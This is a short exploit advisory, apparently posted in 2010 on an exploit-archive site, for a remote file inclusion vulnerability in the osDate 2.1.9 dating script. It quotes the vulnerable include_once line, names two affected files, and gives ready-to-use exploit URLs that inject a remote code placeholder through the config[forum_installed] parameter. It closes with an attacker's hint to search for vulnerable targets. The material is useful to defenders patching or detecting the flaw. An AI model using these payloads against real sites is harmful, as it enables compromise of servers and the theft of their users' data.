osDate v 2.1.9 - Remote File Inclusion Vulnerabilities

Posted on 15 March 2010
======================================================
osDate v 2.1.9 - Remote File Inclusion Vulnerabilities
======================================================

========================================================================================
[o] osDate Remote File Inclusion Vulnerabilities
Software : osDate dating and matchmaking script version 2.1.9 [mostly affected]
Vendor   : http://www.tufat.com/
Download : http://www.tufat.com/s_free_dating_system.htm
Author   : NoGe
========================================================================================
[o] Vulnerable file
include_once($config['forum_installed'] . "_forum.php");
    forum/adminLogin.php
    forum/userLogin.php
[o] Exploit
       http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc0de]
       http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0de]
[o] Dork
       cari ndiri yee.. gampang koq dork na.. :p
========================================================================================


# ~  - [ [ : Inj3ct0r : ] ]
TOP
Malware :

Last 20
Exploits :

Last 20